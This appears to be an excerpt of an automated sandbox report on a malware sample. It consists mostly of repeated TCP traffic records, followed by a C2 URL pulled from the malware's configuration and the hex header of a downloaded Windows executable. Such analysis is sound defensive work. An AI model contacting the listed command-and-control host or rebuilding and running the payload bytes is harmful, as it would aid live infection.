Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://amazonenviro.com/245_Aiymwhpjxsg

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_0290E72C InternetCheckConnectionA,

7_2_0290E72C

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 07 Jan 2025 08:16:47 GMTAccept-Ranges: bytesETag: "65d1a17edc60db1:0"Server: Microsoft-IIS/8.5Date: Fri, 10 Jan 2025 07:58:54 GMTContent-Length: 1161216Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d0 06 00 00 e4 0a 00 00 00 00 00 0c e8 06 00 00 10 00 00 00 f0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 12 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 07 00 6e 26 00 00 00 20 08 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 e8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 57 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 c4 06 00 00 10 00 00 00 c6 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 48 08 00 00 00 e0 06 00 00 0a 00 00 00 ca 06 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 1f 00 00 00 f0 06 00 00 20 00 00 00 d4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 ec 36 00 00 00 10 07 00 00 00 00 00 00 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 6e 26 00 00 00 50 07 00 00 28 00 00 00 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 80 07 00 00 00 00 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 90 07 00 00 02 00 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 7c 00 00 00 a0 07 00 00 7e 00 00 00 1e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 1c 0a 00 00 20 08 